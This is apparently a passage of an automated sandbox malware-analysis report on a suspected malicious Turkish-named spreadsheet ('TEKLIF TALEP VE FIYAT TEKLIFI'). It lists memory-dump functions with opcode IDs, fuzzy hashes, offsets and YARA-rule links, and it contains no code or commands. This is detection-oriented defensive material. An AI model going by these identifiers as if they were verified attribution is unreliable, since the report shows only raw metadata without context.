                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 501f4b8f1b1228237ee91a8f2118e5b6b4a3717b2eaf593fc252bdaa6a22b0ed
                                                  • Instruction ID: 5ff2ad657ccac52f994f375c359aaf2e772a25d37507892f0ac104734c30a7df
                                                  • Opcode Fuzzy Hash: 501f4b8f1b1228237ee91a8f2118e5b6b4a3717b2eaf593fc252bdaa6a22b0ed
                                                  • Instruction Fuzzy Hash: 83F0A0316083414FC715DB29F884C5BBFABEFD4311704863EE00A8B22ADE749C0AC7A0
                                                  Function 057E2689 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7600cd3cb7d31ab41d67ca357298a82017be09a99bf5b95a830208755de1750
                                                  • Instruction ID: 2e1e08bb3ef0fda577d172a5ad611037c39531d96c4f3b44924f8261a374b826
                                                  • Opcode Fuzzy Hash: f7600cd3cb7d31ab41d67ca357298a82017be09a99bf5b95a830208755de1750
                                                  • Instruction Fuzzy Hash: D1F08C3450D344DFC706DF68D890998BFB9AB5B308F1485EDC88457256C631A906EB82
                                                  Function 057E4010 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ab89be58b288169a733425e3ccec87a996a00715ef5662a2714d057311dcbf9
                                                  • Instruction ID: 7b9aad61593d4cd1b779a5a5bc137cd19df6aa7cdbeb43d7c9720564cad17c04
                                                  • Opcode Fuzzy Hash: 4ab89be58b288169a733425e3ccec87a996a00715ef5662a2714d057311dcbf9
                                                  • Instruction Fuzzy Hash: 55F0E534419208DFCB01CFB4D880969BFB5EF5B300F0581EAC8048B252C232AD06DB51
                                                  Function 05AD6538 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c37f9d6220a13c02b59f2f5b6dd2a6c172626f03a9e69b4af85fa7c4e2277418
                                                  • Instruction ID: 4619eb877d7fcd391608b93d551259b75b13f75ae1923b49170de6e58e99daba
                                                  • Opcode Fuzzy Hash: c37f9d6220a13c02b59f2f5b6dd2a6c172626f03a9e69b4af85fa7c4e2277418
                                                  • Instruction Fuzzy Hash: 84E06D309592488FCB16EBB4A8159ACBF75EB47215F0441EED80AA726BC6304D42CBA1
                                                  Function 05AD9090 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1244cf166c247847d76fef04405c67e4ee829d3da07290ef3cb2b2c50022abe1
                                                  • Instruction ID: 1fb066f46d442c47aea6e917aa90e276238bc1f3884b46aad8fbb51b8d38525e
                                                  • Opcode Fuzzy Hash: 1244cf166c247847d76fef04405c67e4ee829d3da07290ef3cb2b2c50022abe1
                                                  • Instruction Fuzzy Hash: C0F0E574509304DFC706EBA4E148DADBFB1AB06215F1141D5E845573A7C3329E05CBA2
                                                  Function 031151D0 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60816f4582bfa61191f671c754f925b50edd30288b31f1733ed0cb654dc0e089
                                                  • Instruction ID: 5a8f00ac05c40c4904462d0bae5bbcd4535311567e1dd38feb6c060341899e14
                                                  • Opcode Fuzzy Hash: 60816f4582bfa61191f671c754f925b50edd30288b31f1733ed0cb654dc0e089
                                                  • Instruction Fuzzy Hash: 85F092305096909FEB97CB3598913E17BB7FBDF350F1D44F6C845C5066D33545528612
                                                  Function 05E23F17 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2cd5b1f346adf62a54b2b58d29b26bb7136a69d99cd6ece7efd649fc48e45c20
                                                  • Instruction ID: 61df35241e7202e5a16dae87c9e2d0235aa290f921005db3238d3011e6919518
                                                  • Opcode Fuzzy Hash: 2cd5b1f346adf62a54b2b58d29b26bb7136a69d99cd6ece7efd649fc48e45c20
                                                  • Instruction Fuzzy Hash: 6801697494021D8FDB60DF18C848AE9B7B2FB49701F1080E9A01DA7384DB345EC88F01
                                                  Function 057E8558 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1abed275139fb90ec139b3e56c19018d0c5fb3dadb141a10bdb7acd486d91cc0
                                                  • Instruction ID: e0c277d1971c40320098461223e111a11c359d969a252690721565ca2b17d030
                                                  • Opcode Fuzzy Hash: 1abed275139fb90ec139b3e56c19018d0c5fb3dadb141a10bdb7acd486d91cc0
                                                  • Instruction Fuzzy Hash: 08F0F874D04208EFCB91DFA9D850AADBBF9AB48311F14C0AAA858D3241D6369B11EF51
                                                  Function 057E56E9 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b02587dbd1d73ca486aa9cba51febaa5379977214d98781b18df3071902d2053
                                                  • Instruction ID: 1891a06f7414d9b34dad935a7ca93f95afff3dea30f271bce2f5d068f2c85200
                                                  • Opcode Fuzzy Hash: b02587dbd1d73ca486aa9cba51febaa5379977214d98781b18df3071902d2053
                                                  • Instruction Fuzzy Hash: B7F08C34418208DFCB04CFA4E8C1E5DBFB4EF5A300F0481E9D8445B252C731A925EB92
                                                  Function 05E05520 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d70d6c5e47588f47372a07514afed96e33121a2be62b022115fc3889040305ef
                                                  • Instruction ID: 2cfeaed08487d780cb669dc9e9ed1a70e853c9722382de56626cd8eb274168ca
                                                  • Opcode Fuzzy Hash: d70d6c5e47588f47372a07514afed96e33121a2be62b022115fc3889040305ef
                                                  • Instruction Fuzzy Hash: 7BF0A0B4C08248AFDB04CBA4C841ABCFBB6EB45304F14D1AAEC8453381C6319A41DF80
                                                  Function 05E02721 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b487d7bd0e31deb04ca3e22e38894582656e36bac034588901f8e4ed63d81a66
                                                  • Instruction ID: 6d457cd90f420b2277402db6048f0dd57fb8e1d7018ab98df55e9a57cadc0873
                                                  • Opcode Fuzzy Hash: b487d7bd0e31deb04ca3e22e38894582656e36bac034588901f8e4ed63d81a66
                                                  • Instruction Fuzzy Hash: 82F0A03A558048AFCB02CEA4D901AA97B72EB49310F149899ED44472A2C7339962DB41
                                                  Function 05AD61F0 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71218203d017ec69e5eb30f30d360174459e46f63933daa56e5a4d601b016386
                                                  • Instruction ID: 08886199be6ceedb9eaea7292fe1fe0c6f2e093aa500b44580d3b35151bc5f98
                                                  • Opcode Fuzzy Hash: 71218203d017ec69e5eb30f30d360174459e46f63933daa56e5a4d601b016386
                                                  • Instruction Fuzzy Hash: 24E0D870D69204DFCF41EFA8D885AACBFB2EB0A211F1041B5E80AD3311E7354941CB61
                                                  Function 05E00FE0 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 074c566a1f55c051b0f907257fb71a469682e0ffd1ed28dce71c3655da3b3956
                                                  • Instruction ID: 00c64f60f233ef9887d4a8d4f53acdab6637e99d5391e7407102ca5c3ce04f96
                                                  • Opcode Fuzzy Hash: 074c566a1f55c051b0f907257fb71a469682e0ffd1ed28dce71c3655da3b3956
                                                  • Instruction Fuzzy Hash: 98E0ED31914208AFD741DFA8DC8169EBBF6EB09305F1080E9C848C7382E2319A81CB40
                                                  Function 05E047F1 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe92bb9423bbaa57153e853c49b75f019b706c9f5be17c402e86db93d2ded47d
                                                  • Instruction ID: ec45f3b0fa125c3488ad2a69ca060b47e745bdab42d9cc214889012f536fa775
                                                  • Opcode Fuzzy Hash: fe92bb9423bbaa57153e853c49b75f019b706c9f5be17c402e86db93d2ded47d
                                                  • Instruction Fuzzy Hash: FCF05874905188EFCB05CFA4D540AACBFB1FB49310F14C0EAE854563A1C6329A91DF40
                                                  Function 03111A90 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3077463728c6f01140b575e766bd61e983cc5b4bbe559faf33267b37eb4512f2
                                                  • Instruction ID: ab1ae08bd35cc61d2b168f2521a72a4f0f716f1811fe5a2bd8c1f2fd2b1b0401
                                                  • Opcode Fuzzy Hash: 3077463728c6f01140b575e766bd61e983cc5b4bbe559faf33267b37eb4512f2
                                                  • Instruction Fuzzy Hash: E1F02B353061908FC341EFB898505957FF5AFDF52031A40D6E849CB37AC6309C01C791
                                                  Function 05E3EF38 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 655b1750ef5236be395328d4da76e7a368c0a8fb0a59402c7d01197e220a5ebd
                                                  • Instruction ID: 126e53e7292f75dbe84c12633bd1b7dfa2256daa6102e6ee33128b525d1d89b2
                                                  • Opcode Fuzzy Hash: 655b1750ef5236be395328d4da76e7a368c0a8fb0a59402c7d01197e220a5ebd
                                                  • Instruction Fuzzy Hash: 8CF03974D15208DFDB00EFA9E4093ECBBB9FB54305F1081AA9849A3390E7789A44DF51
                                                  Function 05AECEB8 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 667f5a0b4e2067b673acee689534526ad00b9e086163230b4401beb793b02644
                                                  • Instruction ID: eefb6b18a3303169b0456f43624c4a3415662f20b873312abc6bf5ef2d7d1500
                                                  • Opcode Fuzzy Hash: 667f5a0b4e2067b673acee689534526ad00b9e086163230b4401beb793b02644
                                                  • Instruction Fuzzy Hash: 22F03070909208AFC705DFA8D45159CFFB5EB45315F2484E9D80897352D7359D11CF41
                                                  Function 057EEDB0 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1728d9e0cc84681a10352253082125a84b7c1e98fc08e6e7ba6ac1c67d093992
                                                  • Instruction ID: 43b1e63ff061a161075df125a8e62ef6089204aa23ccb794344633809eee8a65
                                                  • Opcode Fuzzy Hash: 1728d9e0cc84681a10352253082125a84b7c1e98fc08e6e7ba6ac1c67d093992
                                                  • Instruction Fuzzy Hash: 0AE01A313042095BC7149A2AF984C4BFB9EEFC4264710CA3AA10E87229DE74ED0AC6A0
                                                  Function 057EAF18 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed30bc44c686dbe55c964009a6f486b158363c42adcce849e60dd687cb1529ba
                                                  • Instruction ID: 8648c69a2240ac1563bdf7f13ecd9abaab1fee4087a544a24dedd77f0b011bc5
                                                  • Opcode Fuzzy Hash: ed30bc44c686dbe55c964009a6f486b158363c42adcce849e60dd687cb1529ba
                                                  • Instruction Fuzzy Hash: D1F039B4E15208AFCB40EFA8D4496ACBBF5FB08602F1081EAE844A7351E6349A14EF40
                                                  Function 057EAE78 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df7259e2ac9e98432c3e5c3a7d351cee789fb96d95d407695ba032b46e500d65
                                                  • Instruction ID: 17f93e807b7778653a1567af489547e3ea02c32e570a73fc24d0993b1ec499f0
                                                  • Opcode Fuzzy Hash: df7259e2ac9e98432c3e5c3a7d351cee789fb96d95d407695ba032b46e500d65
                                                  • Instruction Fuzzy Hash: 43F06D71A1E388DFCB01DBB8941E59CBFB5AB09202F5541EAD808D7252E7305A44EB52
                                                  Function 057E2252 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 391808a6ae3b48dcbc345bb1f6cff4e758f3bfee19289fa71d5b60122af91dfc
                                                  • Instruction ID: 290f17163b7dbe0cb516b126e4d17d58bc48f01f3ec1c468caafb25213b0a7f1
                                                  • Opcode Fuzzy Hash: 391808a6ae3b48dcbc345bb1f6cff4e758f3bfee19289fa71d5b60122af91dfc
                                                  • Instruction Fuzzy Hash: 09E04F3450D248AFC702DB54D844E68BBBCEB1F201B0546DA9C099B263D732AE21E762
                                                  Function 05ADFDE0 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc7e1c989c24fc15a1ea5bd178fa0b13401efdd59f8eaef58cf89f18bc2769a5
                                                  • Instruction ID: cfef6d5d90ff136d5f6092ff61dc7f97cc596f8811062c1f9a082c0cb803a8ed
                                                  • Opcode Fuzzy Hash: bc7e1c989c24fc15a1ea5bd178fa0b13401efdd59f8eaef58cf89f18bc2769a5
                                                  • Instruction Fuzzy Hash: D5E02630819208DFD700EBA4D882BADFB75EB54311FA481A8DC061B342CB32AE03DBD0
                                                  Function 05AD782B Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d41feb2301078f9292e37e2203cb076627bdb3a29663475cc3dfd35013f95045
                                                  • Instruction ID: a8347a0fd6b6e359aae7f21f752d63faf3448f99ab6d2b2270231d42c052bc1f
                                                  • Opcode Fuzzy Hash: d41feb2301078f9292e37e2203cb076627bdb3a29663475cc3dfd35013f95045
                                                  • Instruction Fuzzy Hash: EAF07A70D0A218CFD758DF6AC444BACFAF6FB49704F54D099D46A97255DB305481CF10
                                                  Function 05AD9A20 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2b3febe774ab89886f858627b494abc8287a871b9102decbc8ec7463a5b1edf
                                                  • Instruction ID: d650a4f1b6a0aac8be48dfa11e9ad5e6985f70966b3f5f6e269eabadbb4a9518
                                                  • Opcode Fuzzy Hash: b2b3febe774ab89886f858627b494abc8287a871b9102decbc8ec7463a5b1edf
                                                  • Instruction Fuzzy Hash: C8F0EC71E05384BFDB01EF74E941A697BA5EB62104F404099D4085B144EB357E12A751
                                                  Function 05E00F50 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a811d6edf3f1f90935f31d29ed931b92eb020c78ac0d09a6ad42fbde24eb1a2
                                                  • Instruction ID: aa60aa30c691ef760e2e0d689b7e0e9bff6692b20ab10a02b5edd6911325f447
                                                  • Opcode Fuzzy Hash: 9a811d6edf3f1f90935f31d29ed931b92eb020c78ac0d09a6ad42fbde24eb1a2
                                                  • Instruction Fuzzy Hash: E7F06D75D09208EFC701DBA8D4856ACBFB4EF4A301F4451E5E88597361D6309A41EF51
                                                  Function 05AE9CA9 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba5de323c36c7b664396405255a772278d51143277f1a0d2653414781072271a
                                                  • Instruction ID: 15b532aa9af24c301bb48451891db9e31fcbca31d528ce1b65e3aeaf5189db3c
                                                  • Opcode Fuzzy Hash: ba5de323c36c7b664396405255a772278d51143277f1a0d2653414781072271a
                                                  • Instruction Fuzzy Hash: 98E01A71D25248AFCB40EFA8D54579D7AF5FB45205F2040A9C808A3350E7319A94CB52
                                                  Function 05AEBC43 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 005ff9b01a441969685ca539e08571dbe5ad63973602e17dd59890ea934ed040
                                                  • Instruction ID: 70779afd47ef3b5d42afcd298a9df723af6893248d90e36a627ad611483ef103
                                                  • Opcode Fuzzy Hash: 005ff9b01a441969685ca539e08571dbe5ad63973602e17dd59890ea934ed040
                                                  • Instruction Fuzzy Hash: 95E0D83090C10CEFC704DB94D589E9DBBB5EB85305F1091A9D80863351CB329902CBA1
                                                  Function 05AD99D9 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1372fbee4541ebe4953b0388754856f4df49247d1fca3e3f8d7ed5d87be04e38
                                                  • Instruction ID: e383ad7492cbae6f7eff1c84428919d6652ce6b2b78c59ecb55c4bd4d93d6daa
                                                  • Opcode Fuzzy Hash: 1372fbee4541ebe4953b0388754856f4df49247d1fca3e3f8d7ed5d87be04e38
                                                  • Instruction Fuzzy Hash: 86E02B71D05209AFCB01DF60E941B5DBBA5DB02210F0141EDD408A720ADB759E40A7A0
                                                  Function 05E053B0 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da1035b77ce285f083fb73ec3ec7955d3ed02ebeeb5099ec69c530ae8967856c
                                                  • Instruction ID: 7a3556e001c9be8ad1fdef3e4fcd031101340fb4ee4c63d33897334d14d38463
                                                  • Opcode Fuzzy Hash: da1035b77ce285f083fb73ec3ec7955d3ed02ebeeb5099ec69c530ae8967856c
                                                  • Instruction Fuzzy Hash: 4BF0153490420CEFCB01DF98E8409ACBBB6FB48310F10D0AAEC4853351D7729A61EF80
                                                  Function 05E3EE48 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f826732cdd093c932d6831ea2a8029bf06b70648bae4581d11393d4353fcf85
                                                  • Instruction ID: 989906443bfd4f6658bd016e77166a973e4f0596a096e502955d1b4d63d5a048
                                                  • Opcode Fuzzy Hash: 4f826732cdd093c932d6831ea2a8029bf06b70648bae4581d11393d4353fcf85
                                                  • Instruction Fuzzy Hash: FBF06D74D15208AFCB40EFA9D0092ACBFF9FB48701F1081BA984493394E7389E44DF51
                                                  Function 057E41C0 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
